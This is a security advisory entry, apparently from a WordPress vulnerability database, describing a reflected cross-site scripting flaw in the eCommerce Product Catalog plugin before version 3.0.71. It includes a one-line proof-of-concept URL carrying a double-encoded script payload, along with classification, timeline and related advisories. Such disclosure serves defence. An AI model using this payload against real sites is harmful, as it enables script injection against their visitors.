WordPress Plugin Vulnerabilities

eCommerce Product Catalog Plugin for WordPress < 3.0.71 - Reflected XSS

Description

The plugin does not sanitise and escape an URL before outputting it back in an attribute of product category pages, leading to a Reflected Cross-Site Scripting

Proof of Concept

https://example.com/products-category/cat/?product_category=1&a%2522%253e%253cscript%253ealert%2528/XSS/%2529%253c%252fscript%253e=1

Affects Plugins

Plugin icon
ecommerce-product-catalog
Fixed in 3.0.71

References

URL
https://packetstormsecurity.com/files/#168670/

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
CraCkEr
Verified
Yes
WPVDB ID
3ec56fe0-5297-40be-89d0-282a2e9938bc

Timeline

Publicly Published
2022-10-10 (about 1 years ago)
Added
2022-10-11 (about 1 years ago)
Last Updated
2022-10-11 (about 1 years ago)

Other

Published
Title
Published
2019-07-12
Title
Email Subscribers & Newsletters < 4.1.7 - Cross-Site Scripting (XSS)
Published
2023-01-25
Title
Post Views Count <= 3.0.2 - Contributor+ Stored XSS in Shortcode
Published
2023-03-20
Title
WordPress Amazon S3 Plugin < 1.6 - Reflected XSS
Published
2023-02-14
Title
Ocean Extra < 2.1.3 - Contributor+ Stored XSS
Published
2022-03-07
Title
Drag and Drop Multiple File Upload - Contact Form 7 < 1.3.6.3 - Unauthenticated Stored XSS